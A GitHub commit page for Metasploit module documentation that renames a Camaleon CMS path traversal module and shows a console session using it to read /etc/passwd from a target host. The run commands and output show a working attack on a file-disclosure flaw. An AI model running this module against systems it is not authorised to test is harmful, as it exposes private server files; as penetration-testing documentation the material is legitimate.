Skip to content

Commit d530230

Browse files
committed
Reflects module name change in documentation.
1 parent f52184a commit d530230

1 file changed

Lines changed: 6 additions & 6 deletions

File tree

documentation/modules/auxiliary/gather/camaleon_download_private_file.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -133,7 +133,7 @@ Then navigate to "Users -> + Add User" and fill out the form.
133133

134134
## Verification Steps
135135

136-
1. Do: `use auxiliary/gather/camaleon_traversal`
136+
1. Do: `use auxiliary/gather/camaleon_download_private_file`
137137
2. Do: `set RHOST [IP]`
138138
3. Do: `run`
139139

@@ -150,14 +150,14 @@ The number of "../" appended to the filename. Default is 13
150150
## Scenarios
151151

152152
```
153-
msf > use auxiliary/gather/camaleon_traversal
154-
msf auxiliary(gather/camaleon_traversal) > set rhost 10.0.0.45
153+
msf > use auxiliary/gather/camaleon_download_private_file
154+
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
155155
rhost => 10.0.0.45
156-
msf auxiliary(gather/camaleon_traversal) > set rport 3000
156+
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
157157
rport => 3000
158-
msf auxiliary(gather/camaleon_traversal) > set ssl false
158+
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
159159
ssl => false
160-
msf auxiliary(gather/camaleon_traversal) > run
160+
msf auxiliary(gather/camaleon_download_private_file) > run
161161
[*] Running module against 10.0.0.45
162162
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
163163

0 commit comments

Comments
 (0)